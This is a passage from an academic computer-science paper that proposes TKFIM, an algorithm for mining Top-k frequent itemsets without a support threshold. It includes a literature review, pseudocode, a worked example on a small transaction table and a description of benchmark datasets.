in the dataset. User choice allows the user to find Top-most frequent itemsets. Top-most early frequent itemsets procedure finds the Top-most frequent itemsets by repeating the mining process until the desired result is obtained. These approaches generally require more execution time and produce ample result-space, resulting in redundant patterns in the transaction table. N-most is a Top-most frequent itemset mining technique that processes the top N impressive results without specifying any user-parameter (Fu, Kwong & Tang, 2000). It makes use of the Apriori candidate creation procedure and test strategy. It first computes the largest itemset and then compares the support of candidate itemsets, recursively. In every iteration, it updates the support threshold of itemsets. The process continues until the user specified bound on the itemset size. The Top-most mining technique is the Top-k frequent itemsets Iqbal et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.385 2/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.385 mining. Unlike N-most frequent itemsets mining procedure, Top-k finds itemsets of highest support without specifying the itemset size. Top-k frequent itemsets mining may be divided into support threshold and without support threshold-based mining algorithms. These algorithms may also be categorized into algorithms based on Apriori and FP-growth (Agrawal, Imielinski & Swami, 1993; Han, Pei & Yin, 2000). The Top-k algorithms (based on Apriori) build 1-itemset and then attach to 2-itemset and so on. In the end, the results are compared with a user-specified threshold value. Top-k algorithms based on FP-growth use FP-tree for pattern mining. It splits the transactions to reduce the search-space. The critical advantage of FP based algorithms is that they use a tree structure of a transaction database. The disadvantage of using a tree is its difficulty in being stored in memory, and its building procedure is costly. Han et al. (2002) proposed TFP (Top-k frequent closed itemsets mining algorithm), which uses FP-tree without the user’s support threshold. The algorithm constructs the FP-tree based on the primary support threshold starting with zero. It prunes smaller transactions using itemsets length constraints. Mining is performed on the final pruned FP-tree. The algorithms discussed above need to scan the transaction table multiple times to build the tree. They also consume large search-space and uses expensive strategies to improve performance. Details of these methods are discussed in the related work section. Research gap However, summarizing the limitation of the previous studies that are (1) The absence of user-specified support threshold parameter can affect the performance of the FIs mining algorithms, (2) the generation of the exponential number of itemsets and support counting is difficult to handle in Top-k FIs mining techniques, and finally, (3) effectively trimming those transactions that are not useful for the next level, which increases the processing time and degrades performance are the main challenging areas to be handled. To overcome these limitations, we proposed Top-k Frequent Itemsets Mining (TKFIM) algorithm finding FIs without a user-specified support threshold. The working of TKFIM is based on concept equivalence classes of set theory. Each class is an independent group of itemsets. Further, it uses diffset to count the support of the itemsets. The proposed procedure applies to a vertical database structure consisting of transaction IDs (tids) followed by items. Our algorithm adopts a class-based search strategy to quickly find itemsets of highest support, and it mines the candidates of the current class-based on the joining process. If the support of an itemset is less than the least support in the Top-k list, then the current class terminates the generation of candidate itemsets. The next class joining process is then applied accordingly. The process is repeated until no frequent or candidate itemsets are found. Finally, the results of the proposed system are compared with BOMO and Top-k miner on multiple datasets. The contributions of this paper are listed as follows: 1. It presents FIs based Top-k algorithm that reduces the number of scans and decreases the run time. 2. It finds all frequent FIs and IFIs, and do not miss any pattern. Iqbal et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.385 3/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.385 3. This research provides a comprehensive review of the existing literature in the field of frequent itemset mining. 4. Based on the critical analysis, this paper highlights the limitations of the state-of-the-art research studies used for FIs mining. 5. The pruning strategy is used in this paper to reduce the number of candidate frequent itemsets. 6. Afterwards, a novel approach (i.e., TKFIM) is proposed, designed, implements based on equivalence classes and diffset theory. 7. The experimental results show that TKFIM has a significant advantage over the existing algorithms. Finally, TKFIM results are compared with BOMO and Top-k miner techniques. These algorithms are evaluated on five different datasets, i.e., Chess, Mushroom, Connect, and Synthetic dataset. Further, the performance gains on each dataset are recorded. In the first experiment, on the Chess dataset, the average performance gain of 97.14% and 92.70% was achieved compared to BOMO and Top-k miner, respectively. Similarly, on the Mushroom dataset, more than 100% and 35.87% performance gain was achieved concerning BOMO and Top-k miner. On the third dataset, i.e., Connect 78.10% and 28.53% performance gain was delivered compared to BOMO and Top-k miner, respectively. In the final experiment on the Synthetic dataset (T1014D100K), the average performance gain of 99.70% and 81.27%was recorded for BOMO and Top-k miner. RELATED WORK In the area of Frequent Itemset Mining, the very first algorithm, i.e., Apriori, was proposed by Agrawal, Imielinski & Swami (1993). This algorithm uses a bottom-up search method to process the extraction of frequent itemsets. It handles all itemsets in k-steps where k represents the size of a given database. In the first step, all the frequent 1-itemsets are generated. In the second step, all the frequent 1-itemset are joined to compute 2-itemsets, compare their support with the given specified minsup. All the frequent 2-itemsets are processed for the subsequent 3-itemsets. The process continues until no itemsets can be found. Another classical algorithm referred to as Eclat was proposed by Zaki (2000). The transaction database and minsup are used as the input for this algorithm. It counts the support of itemsets using tids, which is the length of the itemset. Eclat algorithm is more efficient than those algorithms which repeatedly scans the database, but it requires more memory to store the tidsets. dEclat algorithm is a variation of the Eclat algorithm implemented using a structure called diffsets (Zaki & Gouda, 2003) rather than tidsets. FP-growth is proposed by Han, Jiawei, and Pei, Jian in 2000 for finding frequent itemsets without candidate generation (Han, Pei & Yin, 2000). It uses FP-tree for computing frequent itemsets by scanning it at least twice. In the first scan, it processes frequent patterns of length-1 and counts their support value. In the second scan, the items are sorted in decreasing order of their support. It splits the database to build multiple conditional FP-trees, which considerably reduces the search-space. FP-growth works better than Apriori because the data in the memory is a tree structure form. All the conventional Iqbal et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.385 4/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.385 algorithms involve an enormous search-space, and it may expand exponentially. The database also needs to be searched regularly, which requires a lot of runtimes. However, since the threshold parameters for these algorithms are required, selecting the threshold value remains a difficult task. If the threshold value remains very high, too many items will be produced. On the other hand, it can lead to too few frequent items when support is too high. Top-most FIs itemset mining algorithms are proposed to solve this issue of traditional FIs mining methods, Top-most FIS methods Top-most FIs refers to the user choice of FIs in the dataset. User choice allows the user to find Top-most FIs. Top-most early FIs procedure finds Top-most frequent itemsets by repeating the mining process until the desired result is obtained. The researcher found two significant problems in early Top-most FIs procedures. First, it takes much more execution time to find the result. Secondly, it produces large search-space and result-space. Recently, a novel scheme of Top-most FIs mining called N-most interesting frequent itemsets has been projected (Fu, Kwong & Tang, 2000). It processes the Top-N impressive results without specifying any user parameter. It makes use of the Apriori candidate creation procedure and test strategy. It first computes the largest itemset in the dataset. The N-largest itemsets mining compares the support of the candidate itemsets recursively and updates the support threshold at the end of the iteration. The process is iterated and stops at the user-specified bound on the itemset size. The Top-most FIs mining is divided into two different sets of mining Processes, including N-most and Top-k itemsets. The details are discussed in the following sections. N-most interesting FIS procedures It combines the N-most interesting frequent k-itemsets for every K where 1<= K <=m and K is the user-supplied maximum size of the itemsets to be mined. This mining process comes from the Itemset-iLoop and Itemset-Loop algorithms (Fu, Kwong & Tang, 2000). The Itemset-Loop is the first technique proposed in N-most interesting frequent itemsets mining category. Its method of candidate creation is similar to the Apriori candidate process. Itemset-loop algorithm first computes the set of potential 1-itemset, and then the new potential 2-itemsets are rooted from 1-itemsets. In the next iteration, new potential 3-itemsets are produced from a 2-itemset. The process is iterated and ends at the user- specified hop on the itemset sized. Hence it requires loops back in the kth iteration to generate N-most exciting itemsets. The idea of the Itemset-iLoop method is similar to that of Itemset-Loop, except it goes back first to check k -1 itemsets. The underlying principle for both methods is that if a K-itemset is not frequent, all its subsets are rare. For mining N-most intriguing itemsets, this Apriori standard does not apply. Cheung & Fu (2004) have introduced a technique based on the principle of Build Once and Mine Once (BOMO) to address the drawbacks of the most interesting items in mining. This procedure is based on the free parameter for N-most exciting items. The BOMO is a technique based on FP-growth that uses the inherent characteristics of the Iqbal et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.385 5/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.385 compact pattern-tree structure. It works without candidate generation to improve results in frequent itemsets mining problems. Being an FP-growth-based approach, BOMO suffers from common demerits, such as scanning the database multiple times to evaluate itemsets’ support. FP-tree structure is time-consuming, and visiting nodes to evaluate the support of itemsets is very in-efficient. Consequently, the size of the database is immense. Thus it may not be possible to store it in the main memory. As a result, the result set will cause the failure of the mining operation. TOP-K FIs mining methods The Top-k FIs mining methods can be categorized as support threshold and non-threshold- based algorithms. Most frequent pattern mining algorithms depend on the right minimum support threshold parameter. However, as already discussed, it is very tricky in practice to determine the right value for this parameter. Therefore another category of Top-k frequent itemsets algorithms is proposed, which are threshold-free. The Top-k FIs mining techniques are also classified as Apriori and FP-based algorithms. The Apriori based techniques generate FIs of 1-itemsets, and then produced 2-itemset by joining them, and similarly 3-itemsets, and so on. On the other hand, FP-growth based Top-k FIs techniques make use of FP-tree for frequent mining patterns. It divides the transactions to reduce the scope of the search. The main advantage of FP-growth based algorithms is that the tree data structure is an unstructured form of the transaction database. These types of algorithms cannot be stored in memory and, therefore, costly to build. However, vertical format based techniques are more intuitive and straightforward as compared to horizontal format developing approaches. Top-k Frequent closed itemsets, the algorithm called TFP without the minimum threshold using the FP tree, have been suggested by Han et al. (2002). The algorithm begins with the FP-tree, the primary threshold being set at zero. The smaller transaction, i.e., a transaction with length <minimum length, is pruned during the tree’s construction. After FP-tree construction, it uses a closed node count and a descendant sum method to prune the relatively unusual patterns by increasing the support threshold. In order to accelerate the process, the TFP algorithm uses FP-tree accessing strategies such as bottom-up and top-down. Mining is performed on the final pruned FP-tree. On the other hand, the TFP algorithm has many demerits. For the FP-tree, the database must be scanned twice. The TFP is an FP-growth-inspired method and uses two parameters. This algorithm consumes a large search-space and uses expensive strategies to improve performance. Amphawan, Lenca & Surarerks (2009) have focused on finding Top-k periodic-frequent patterns. It initially considers the highest support patterns and then combines candidates to form the Top-k periodic-frequent patterns list. Pietracaprina & Vandin (2007) suggested that Top-k Miner find Top-k frequently closed unlimited items. The algorithm starts primarily with approximate minimum support having heuristics similar to those references in the above Top-k closed frequent itemsets mining procedures. This procedure has dynamically raised the support threshold with no need to restart computation. It uses the priority queue to stop comparing the support of closed itemsets. Further, it adopts the best-first search to Iqbal et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.385 6/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.385 produce the first highest support closed itemsets. At the point when all the closed itemset support is processed, it terminates the main loop. At this point, k is assigned a new value, and the loop repeats to generate the highest support closed itemsets. A naive approach called the Combination Reducing Method (CRM) is recently proposed by Pyun & Yun (2014). This algorithm reduces time and saves memory by applying the composite pattern concept. The CRM is FP-growth based algorithm that constructs a conditional FP-tree. The algorithm starts with an initial support threshold of zero while building the FP-tree from the dataset. Following this, the algorithm constructs a global FP. During the development of the FP-tree, a header table is generated simultaneously. The sequence of selecting the prefix is different from FP-growth. The prefix is the center item in the header table that is quite suitable for the mining of Top-k frequent patterns. It can raise the threshold effectively and process patterns quickly. CRM does not consider the pattern length, so the Top-k patterns are placed without length constraints into the Top-k list. The current Top-k Composite pattern list and the recovery phase are used to create Top-k patterns. On the other hand, the CRM algorithm has numerous disadvantages. To build the FP-tree, it still has to scan the database twice. CRM is an FP growth inspired approach and uses two parameters. This algorithm requires a large search-space and is expensive using the recovery phase to improve the performance. The Top-k list includes many redundant composite patterns when the value of k is put as a large. Pyun & Yun (2014) also developed a combination reduction method for N-itemsets (CRMN) followed itemset length constraints. CRMN scans the dataset at least two times, and initial support is set to zero. In the mining procedure, CRMN first constructs FP global-tree. It subsequently mines Top-k patterns from FP-global-tree. During this process, the composite patterns are grouped into k-patterns for each length in the Top-k list if the present conditional FP tree has one-path. If the tree has a multipath, the algorithm will detect frequent patterns and insert them into the Top-k list according to its lengths. Salam & Khayal (2012) proposed Top-most and Top-k methods based on the association graph structure. A Symmetric matrix stores the entry of the graph as a data structure. The algorithm scans the database once and starts with the FP tree with the initial support threshold of zero during the construction of the All-path Source to Destination (ASD)- tree (Salam & Khayal, 2012). This method mines search-space and construct an ASD tree simultaneously. It suffers from serious demerit that it computes all 2-itemsets and scans each transaction to build an association ratio graph. It computes edge values simultaneously to detect a maximum cycle. The other drawback in this approach is that it identifies those itemsets as Top-k itemsets, but originally itemset has low dataset occurrence. Recently, Saif-Ur-Rehman et al. (2016) suggested a Top-k miner approach to find FIs. They scan the database once and find a supporting threshold higher than zero for all the frequent 2-itemsets. They use Candidate itemsets Search Tree (CIS-tree) (Saif-Ur-Rehman et al., 2016) to mine the desired number of Top-k FIs of highest support. The technique suffers from various limitations, such as it computes 2-itemsets before constructing the CIS-tree, which is expensive to build as it consumes much memory. This algorithm has reduced the search-space but has increased the runtime of the mining Iqbal et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.385 7/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.385 process. Furthermore, the frequent itemsets joining procedure for the construction of CIS-tree is a time-consuming process. As discussed above, several frequent itemset mining practices were proposed, but they all face a challenge to reduce the time needed to calculate and reduce the space needed to perform the algorithm to mine all the frequent patterns required. The summary of Top-k FIs mining algorithms’ strengths and weaknesses are shown in Table 1. It suggests that Top-k frequent mining algorithms are needed to be further improved to produce efficient output. PROPOSED METHODOLOGY The objective of this paper is to present algorithms that can find Top-k frequent itemsets without using the minsup parameter. The proposed algorithm begins by requesting that the user provide a ‘‘k’’ value, i.e., how many FIs does he required? The system proposed initially generates a frequent itemset of size one by scanning the database for the first and last time. Then the system uses equivalence classes to create the next frequent itemset level. The process repeats; initialize the item k at the next level to the lowest support until no frequent items or items can be found. The proposed work has two significant advantages: it does not require a support threshold, and secondly, the database is scanned once to generate FIs. The detailed working of the proposed technique is discussed in this section. Before going into exact steps, a few definitions are essential to understand. Def-1: Frequent Itemsets: In a given database D, an itemset X is referred to as Frequent Itemsets if its support is greater or even equal to the support of k itemset in a set of items I, where I is the set of items in the decreasing support order the support value is calculated from the user-supplied value of k (Saif-Ur-Rehman et al., 2016). Def-2: Identical Frequent Itemsets: In the given dataset D, Identical Frequent Itemset (IFIs) are those frequent itemset S = X1, X2...Xm has the same support as of set S where 1<=m<=I and S ⊆ I (Saif-Ur-Rehman et al., 2016). Def-3: Top-k Frequent Itemsets: A set of all IFIs in S= {X1, X2,.....Xm} is called Top-k frequent itemset if it includes frequent itemset of the highest support to the k th support itemset in I, where I is a set of all identical frequent itemsets (Yildirim, Birant & Alpyildiz, 2017). Top-k List Structure In this sub-section, we describe list (Amphawan, Lenca & Surarerks, 2009) is an efficient data structure uses in our method to accommodate candidate itemsets. The list is created dynamically based on the itemset to be generated, which holds all possible k itemsets based on users supplied value of k. The items in the list are sorted in support descending order. Using a linked list in the suggested algorithm effectively reduces processing time and retrieves the itemsets from memory faster than an expensive I/O operation. The proposed TKFIM algorithm uses vertical format datasets to generate frequent itemsets. List contains the set of nodes at different levels. The 1-itemsets, 2-itemsets, or more are generated from the vertical dataset. Iqbal et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.385 8/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.385 Table 1 Summary of the Top-K Frequent Itemsets Mining Algorithms. S.No Algorithm Purpose of algorithm Storage Strengths Limitations 1 Top k closed frequent patterns (TFP) (Han et al., 2002) Generate the top k closed patterns for specified value of k Array Without support threshold Limit on candidates’ FIs. Item- sets mining method without candidates production •Scan the database at least 2- times. • It misses certain important patterns •Due to Itemsets length restric- tion. •Represent the only Itemset of higher support in the Top-k while other itemsets of similar support are not considered as top- k itemsets. 2 Top-N (Fu, Kwong & Tang, 2000) Generate the topmost patterns for specified value of N Array Without support threshold FIs method •Approach multiple scans •Set two parameters. •Apriori Based •Forced to reduce Search-Space •Huge Search Space 3 CRMN (Pyun & Yun, 2014) To generate Top k Patterns with Com- binations reducing method for N- item- sets. FP- tree Without support threshold. Itemsets mining method with- out candidates’ pro- duction. •More than 1- inputs parame- ters •STP Based Approach •Forced to reduce Search-Space •Scan DB multiple times •Required high computation time 4 CRM (Pyun & Yun, 2014) To generate Top k patterns with Com- binations reducing method for N- item- sets. FP- tree Without support threshold. Itemsets mining method with- out candidates’ pro- duction. •Search-Space focused •Huge Search Space •Scan DB multiple times •Heavy computation time re- quired (continued on next page) Iqbal et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.385 9/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.385 Table 1 (continued) S.No Algorithm Purpose of algorithm Storage Strengths Limitations 5 Top-k maximal FIs without support threshold (Salam & Khayal, 2012) To find Top-most FIs based on association ratio graph structure. Graph Without support threshold. • It computes all 2-itemsets and scans each transaction to build all path sources to destination tree (ASD Tree) simultaneously. • It identifies those itemsets as Top-k itemsets originally item- set has low occurrence in the dataset. 6 Top-k Miner (Saif- Ur-Rehman et al., 2016) To find Top-k FIs without support threshold using CIS Tree. CIS Tree Without support threshold. Reduced the Search Space •High computation time re- quired high memory Consump- tions. •The FIs joining procedure is a time consuming process until the desired result is obtained. 7 TKFIM [Proposed] Top-k frequent item- sets Mining without support threshold based on Equivalence classes Lookup List Reduce search space and run time •The Top-k-FIs mining first generates the entire 1-itemsets with support from the given dataset which consumes huge memory at first level. •Search space focused Tech- nique The Top-k list does not store any non-frequent itemset. The Top-k list structure of a node is given in Fig. 1: Where the Top-k list structure of a node having first field is used to store itemset, the second is the support field identified the number of times the itemset occurs in the dataset. Diffset is the third field which stores the difference set of transaction id of transactions. The last field’s size points to the level of an itemset. Detailed working of the algorithm It is a difficult task to find Top-k frequent itemset in large databases. This section presents the evolution of a new Top-k mining algorithm to calculate Top-k all IFIs without the support threshold. The proposed procedure applies to a vertical database structure that consists of transaction IDs followed by Items. Our technique uses a class-based search strategy for searching itemsets with the highest values of support, and it mines the candidates of the current class-based on the join process. The candidate itemsets generation for the current class will be avoided If an itemset has less support than the least support in the Top-k. The next class membership process is then applied accordingly and repeated until no frequent items or candidate items have been identified. Iqbal et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.385 10/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.385 Itemsets Support Diffsets Size Figure 1 Structure of Top-k list. Full-size DOI: 10.7717/peerjcs.385/fig-1 Algorithm 1 Top-k FIs Mining Algorithm 1: Scan D to generate 1-itemset with support count 2: Create top-k list and 1-itemsset is initialized 3: Order Top-k list in descending order of the support count 4: Smallest k assign to the least support kth itemset in the Top-k list 5: Generate Candidate-Itemsets with support count using diffset 6: Create a list Top-k 7: while k <l en l i st do 8: k 1 + + 9: while k 1 <l en l i st do 10: if pr e f i x A == pr e f i x B then 11: I tems← [I tem A , I tem B ] 12: ke y ←pr e f i x A + I tems 13: diffset ←t (Item A)− t (Item B) 14: support ← t (Item A) –diffset 15: end if 16: Create an itemset entry and insert it into the Top-k list 17: if support >= smallestk then 18: I temset [key]← support 19: else if support <smallestk then 20: break 21: end if 22: end while 23: k 1 + + 24: k + + 25: end while 26: Repeat step 3, 4 and 5 until no candidate itemsets can be found 27: Return Top-k list of FIs The pseudocode of our proposed methodology is given in Algorithm 1, and the details of each step are described below: 1. Scan the Database and transform it into a vertical format. 2. Sort all items in descending support order. 3. Initializing Top-k list to 1-Itemset, where k is the user-provided number of a frequent itemset. Iqbal et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.385 11/27 https://peerj.com https://doi.org/10.7717/peerjcs.385/fig-1 http://dx.doi.org/10.7717/peerj-cs.385 4. Computing 2-itemsets from 1-itemset using diffset till the least support itemset in Top-k list using equivalence class concept. 5. The process continues until the lowest support of an item on the next stage and no frequent items or candidates can be found. 6. Then, the Top-k list is returned. Lemma 1: In the frequent itemsets mining, the support value of the itemset is used to apply the anti-monotone property. Proof: Suppose that there are n transactions in the database, and data structures are constructed. There are patterns P in D with m length and pattern P′ in D, which is supper pattern of P, with m+1 length. In the worst case, both P and P′ are included in T (k <=n). The anti-monotonic property means that if any P is an invalid pattern, the supper pattern P′ of P is also an invalid pattern, which must be satisfied in this method. However, in the general case, the set of transactions containing P′ is a subset of the set of transactions containing P. Thus, Sup(P′ ) <= Sup(P) is always established. If the P is an invalid pattern, sup(P′) <= sup(P) <= misupp is valid. As a result, the itemset count value that satisfies the anti-monotone property (Nam et al., 2020a). Running example of TKFIM algorithm The algorithm is expressed by using database D, as shown in Table 2. It contains ten transactions having six different items. Consider the number of required results specified by the user k is four and six. Our task is to find the Top-k itemsets with the highest support from the given transaction dataset. Table 3 illustrates the generated Top-2, Top- 4 and Top-6 frequent itemsets from the given transaction database D. The first column in transaction databases represents the tids of itemsets, whereas the second column describes the itemsets. Step 1: Generating 1-itemset by scanning the Transaction database The format of the input dataset is of considerable importance in most of the frequent itemsets mining algorithm. There are two types of dataset representations. One is a horizontal data format, and the other is a vertical data format. In a horizontal data format, a transaction database is similar to a list/array of transactions. Each of the TID contains the itemsets. The horizontal transaction database format is given in Table 4. In a vertical data format, each record represents a transaction. This transaction contains itemsets followed by a distinct transaction identifier. The vertical transaction database format is shown in Table 5. Most of the previous work adopts horizontal dataset representation. Our algorithm has used the vertical layout of the dataset because the horizontal data format has some drawbacks. We first transform the input horizontal transaction dataset into a vertical format with only frequent itemsets and their corresponding transaction IDs. This generates the k-itemsets of size one, as shown in Table 6. Iqbal et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.385 12/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.385 Table 2 Transaction Database. TID Items 1 A,B,D,F 2 A,B,F 3 A,D,F 4 B,C,D,E,F 5 B,C,D,E,F 6 A,B,F 7 A,B,D,F 8 A,B,F 9 A,B,C,D,F 10 A,B,C,E,F Table 3 Generated Top-2, Top-4 and Top-6 Itemsets. Top-k FIs Top-2 FIs Top-4 FIs Top-6 FIs 1 F:10 F:10 F:10 2 B:9, BF:9 B:9, FB:9 B:9, FB:9 3 A:8, FA:8 A:8, FA:8 4 BA:7 BA:7 5 D:6, FD:6 6 BD=5, FBD=5 Table 4 Horizontal database format. TID Items 1 A,B,D,F 2 A,B,F 3 A,D,F 4 B,C,D,E,F 5 B,C,D,E,F 6 A,B,F 7 A,B,D,F 8 A,B,F 9 A,B,C,D,F 10 A,B,C,E,F Step 2: Sort all items in descending support order All items are sorted in descending order, as shown in Fig. 2 (Step 2). Step 3: Computing 2-Itemsets from 1-Itemsets using Diffsets Pruning process The candidate’s generation process is based on two constraints. First, it requires the size of the itemsets to be the same. Secondly, both itemset must have the same prefix, which means that each item of the itemset is identical except the last. When both itemsets meet Iqbal et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.385 13/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.385 Table 5 Vertical database format. Itemsets TID F 1,2,3,4,5,6,7,8,9,10 B 1,2,4,5,6,7,8,9,10 A 1,2,3,6,7,8,9,10 D 1,3,4,5,7,9 C 4,5,9,10 E 4,5,10 Table 6 Converted vertical database format. Itemsets TID A 1,2,3,6,7,8,9,10 B 1,2,4,5,6,7,8,9,10 C 4,5,9,10 D 1,3,4,5,7,9 E 4,5,10 F 1,2,3,4,5,6,7,8,9,10 these limitations, k + 1 itemset is generated from k-itemsets with the help of equivalence classes, i.e., 2-itemsets at the next level are generated by joining every two k-itemset. Top-k frequently mined itemsets calculate the difference between the Tids lists in both items to find the support value. This will be the support of the newly generated itemsets. If the new itemset support is higher than the minimum kth support item in the Top-k list, the newly generated itemset is entered in the Top-k list. Likewise, the kth pattern is removed from the list of Top-k list and is designated as infrequent itemsets. After this step, our first iteration is completed, and as a result, each 2-itemsets is generated in the same manner as like itemset ‘FB’. We get the 2-Itemsets, as shown in Fig. 2, Step 4). Pruning Process in Step 3 As shown in Fig. 2 (Step 1), we compute 2-itemsets from 1-itemsets using difference sets in the given running example. Item ‘F’ and ‘B’ are combined and append together to generate the itemsets ‘FB’ is a Top-k frequent itemset. The difference set of ‘FB’ and support is calculated, which is 9. The support of ‘FB’ is greater than the minimum support inferred as support of the kth itemset in the Top-k list. Which can be used as support to prune the itemset, then the itemset ‘FB’ is inserted into the Top-k list, and as a result, each 2-itemset are generated in the same manner as like itemset ‘FB,’ as shown in Fig. 2 (Step 3). Step 4: Remove Infrequent Itemsets by counting k value The 1-itemset node E and C are removed by counting the k value in the Top-k list. The 2-itemset nodes are removed because their frequency is less than the minimum kth support item in the Top-k list. Iqbal et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.385 14/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.385 Figure 2 Generation of Top-k list structure. Full-size DOI: 10.7717/peerjcs.385/fig-2 Iqbal et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.385 15/27 https://peerj.com https://doi.org/10.7717/peerjcs.385/fig-2 http://dx.doi.org/10.7717/peerj-cs.385 Step 5: Repeating step-2 to step-4 We start the second iteration by sorting the generated 2-itemset given in Fig. 2 (step 6). We do not need to scan the database any more to link 2-itemset in the Top-k list. A new entry is created at every occurrence of an item in the Top-k list. The itemsets are initialized with support and Tids-list. The least support itemset used for the pruning process becomes the k itemset in the Top-k list. Then, the itemsets in the list are updated. The Top-k list has been arranged in the order of descent. Finally, all items with less support than the kth item in the Top-k list are removed from the Top-k list, according to the Top-k counting procedure, when the user sets the k value. The itemset generation process is repeated. So in this iteration of the loop, we compute 3-itemsets from the 2-itemsets using diffset till the least support itemset in the Top-k list. Next level itemsets are generated with the help of equivalence classes. The generated 3-Itemsets are as shown in Fig. 2 (step 7). The process repeats until there are no frequent itemsets found. After that Top-k list is returned as required by the user. Step 6: Top-k list is returned The generated Top-k-List is shown in Fig. 2 (step 8) returned by the TKFIM algorithm. The procedure of the Top-k frequent itemsets mining (TKFIM) method for the example mentioned above is shown in Fig. 3. EXPERIMENTAL RESULTS In this section, we present the evaluation of the proposed system. First, there are standard data sets freely available, so they have been used to evaluate the proposed algorithm. We also compare our algorithms with two recent related methods: the Top-k miner algorithm, which find the Top-k frequent itemsets by using the Candidate Itemset Search (CIS-tree) (Saif-Ur-Rehman et al., 2016) and the BOMO algorithm calculating the common Top-k itemsets (Cheung & Fu, 2004). The fact that they are newly proposed techniques and provided better results than their previous ones is the reason for selecting these two approaches. The techniques calculate frequent element sets by requesting k from the user. The experimental setup and dataset are provided in the following section. Experimental setup and datasets Several experiments were conducted to measure the performance of the algorithm and compare its results with the methods referred to above. The datasets are available freely and downloaded from the Frequent Implementation of Items and Mining (FIMI) data repository (Goethals, 2003). The dataset details are given in Table 7. The first column of the table shows the dataset name. In the second column, the total number of transactions in a particular data set is described. Whereas the number of items in one transaction is displayed in columns such as Avg-length and Items column represents the total number of unique elements within a dataset. The last column shows the dataset type. The transaction dataset Chess, Mushroom, Connect, and the T10I4D100 K dataset are three real transactions. Chess is the first real dataset with 75 items and 3,196 dealings. It is a dense dataset with long and short itemset. There are 120 items in the Mushroom dataset Iqbal et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.385 16/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.385 TID Items 1 A,B,D,F 2 A,B,F 3 A,D,F 4 B,C,D,E,F 5 B,C,D,E,F 6 A,B,F 7 A,B,D,F 8 A,B,F 9 A,B,C,D,F 10 A,B,C,E,F 1 Scan D 2-Itemsets Items Diffset Support FB { 3 } {9} FA {4,5} {8} FD {2,6,8,10} {6} FC {1,2,3,6,7,8} {4} FE {1,2,3,6,7,8,9} {3} BA {4,5} {7} BD {2,6,8,10} {5} BC {1,2,6,7,8} {4} BE {1,2,6,7,8,9} {3} AD {2,6,8,10} {4} DC {1,3,7} {3} CE {9} {3} Items TID’s List A {1,2, 3,6,7,8,9,10 } B {1,2,4,5,6,7,8,9,10} C {4,5,9,10} D {1,2,3,4,5,7,9} E {4,5,10} F {1,2,3,4,5,6,7,8,9,10} Compute 1-itemsets 3-Itemsets Items Diffset Support FBA { 4,5 } {7} FBD {2,6,8,10} {5} 2 34 Let User Specified Number K= 6 1-Itemsets Items TID’s List F {1,2,3,4,5,6,7,8,9,10} B {1,2,4,5,6,7,8,9,10} A {1,2, 3,6,7,8,9,10 } D {1,2,3,4,5,7,9} C {4,5,9,10} E {4,5,10} Figure 3 Generation of frequent item sets. Full-size DOI: 10.7717/peerjcs.385/fig-3 Table 7 Datasets characteristics. .Datasets # Transactions Ave-length #Items Type Data set source Chess 3,196 37 76 Real http://fimi.uantwerpen.be/data/chess.dat Mushroom 8124 23 120 Real http://fimi.uantwerpen.be/data/mushroom.dat Connect 67,557 43 130 Real http://fimi.uantwerpen.be/data/connect.dat T10I4D100K 100,000 10 1,000 Synthetic http://fimi.uantwerpen.be/data/T40I10D100K.dat and 8124 transactions. The transaction size is an average of 23. This is a sparse dataset that contains a small number of common items. Over 130 items are built to connect. The longest average transaction volume 43 is a dense dataset. T10I4D100K is a synthetic dataset containing 1,000 items and a total transaction count of 100,000 items. This dataset has an average of 10 transactions. The proposed technology was carried out in the programming language version 3.8.1 of Python for experimentation. The Core2duo machine with two gigabytes of memory and Windows 10 operating system is the experimental environment. Results We have performed experiments on three real and one synthetic dataset. The first experiment has been performed on the aforementioned dataset and the results of the TKFIM as shown in Table 8. The first column of the Table shows the transaction dataset sequence, the second column contains the data set name, the third column describes the Iqbal et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.385 17/27 https://peerj.com https://doi.org/10.7717/peerjcs.385/fig-3 http://fimi.uantwerpen.be/data/chess.dat http://fimi.uantwerpen.be/data/mushroom.dat http://fimi.uantwerpen.be/data/connect.dat http://fimi.uantwerpen.be/data/T40I10D100K.dat http://dx.doi.org/10.7717/peerj-cs.385 TKFIM data of k=10, the fourth column shows the transaction datasets of Top-k miners, and the second column shows the results of the BOMO procedure and the last column shows the itemsets missing by BOMO. In the first stage, we compare the frequent itemsets generated by TKFIM with the Top-k miner and BOMO approach. For the Top-10 frequent itemsets on four datasets, we show the results in Table 8. In the past, the Top-N and the Top-N support threshold for frequently used item sets are mining methods, such as FP-growth, Top-N, and CRMN. These methods fail to provide important support patterns due to the tuning of the threshold parameters. The BOMO is one of the top pattern mining approaches using two parameters (Cheung & Fu, 2004). The N-most interesting itemset is the union of the N-most interesting itemsets with the highest supports for the value of some k. 